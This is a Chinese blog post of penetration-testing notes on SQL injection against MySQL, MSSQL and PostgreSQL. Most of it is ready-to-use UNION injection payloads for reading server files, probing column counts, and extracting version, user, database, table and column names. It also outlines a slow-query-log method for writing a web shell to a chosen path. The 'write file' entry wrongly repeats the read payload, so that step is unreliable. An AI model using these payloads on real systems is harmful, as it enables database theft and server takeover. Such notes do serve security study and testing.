网络安全之攻防笔记--通用漏洞SQL注入之MySQL&mssql&postgresql

Dawndddddd2025-02-19 22:08

  • 通用漏洞SQL注入之mysql&h&mssql&postgresql

    • mysql数据库

      • root高权限读写注入

        • 读取文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 写入文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 路径获取
          • phpinfo,报错,字典等

        • 无法写入

          • secure_file_priv 突破 注入中需要支持 SQL 执行环境,没有就需要借助 phpmyadmin 或能够直接连上对方数据库进行绕过
          • set global slow_query_log=1
          • set global slow_query_log_file='shell 路径';
          • select '' or SLEEP(1);
    • mssql数据库

      • 高权限读写注入

        • 可以执行系统命令、读写文件操作

        • 测列数

          • ORDER BY 4
          • AND 1=2 UNION SELECT NULL,NULL,NULL,NULL
        • 测显位
          • AND 1=2 UNION SELECT NULL,'NULL',NULL,NULL

        • 获取信息

          • AND 1=2 UNION SELECT NULL,@@VERSION,NULL,NULL
          • AND 1=2 UNION SELECT NULL,SUSER_NAME(),NULL,NULL
          • AND 1=2 UNION SELECT NULL,DB_NAME(),NULL,NULL
        • 获取数据库名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM master..sysdatabases
        • 获取表名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM sysobjects WHERE xtype='U'
        • 获取数据
          • AND 1=2 UNION SELECT NULL,column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
    • postgresql数据库

      • 高权限读写注入

        • 测列数

          • order by 4
          • and 1=2 union select null,null,null,null

        • 测显位:第2,3

          • and 1=2 union select 'null',null,null,null 错误
          • and 1=2 union select null,'null',null,null 正常
          • and 1=2 union select null,null,'null',null 正常
          • and 1=2 union select null,null,null,'null' 错误

        • 获取信息

          • and 1=2 UNION SELECT null,version(),null,null
          • and 1=2 UNION SELECT null,current_user,null,null
          • and 1=2 union select null,current_database(),null,null
        • 获取数据库名:
          • and 1=2 union select null,string_agg(datname,','),null,null from pg_database

        • 获取表名

          • 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
          • 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
        • 获取数据
          • and 1=2 union select

    • 另外

      • access无高权限注入点--只能猜解,还是暴力猜解
      • MySQL,postgresql,mssql高权限注入点-可升级读写执行
相关推荐
三品吉他手会点灯3 小时前
C语言学习笔记 - 43.运算符与表达式 - 运算符1 - 运算符的分类和简单介绍
c语言·笔记·学习·算法
疯狂打码的少年3 小时前
中断处理过程与中断优先级
笔记
likerhood4 小时前
WSL 下安装 Miniconda 笔记
笔记·wsl
胖胖胖胖胖虎5 小时前
SQL json_table 行转列方法
sql
网管NO.15 小时前
子查询进阶|EXISTS/IN/ANY/ALL,优化查询效率
数据库·sql
喜欢打篮球的普通人6 小时前
LLVM 后端流程与关键数据结构:从 IR 到机器码的入门笔记
java·数据结构·笔记
烛之武6 小时前
Pytorch学习笔记(1)
pytorch·笔记·学习
一只鹿鹿鹿6 小时前
网络安全评估方案
java·大数据·运维·物联网·web安全
橘子海全栈攻城狮7 小时前
【最新源码】鸟博士微信小程序 023
spring boot·后端·web安全·微信小程序·小程序
chushiyunen7 小时前
业务模型笔记
笔记
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03Codex 下载安装指南:Windows 和 macOS 官方版下载04【AI】2026 年具身智能模型和世界模型总结05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法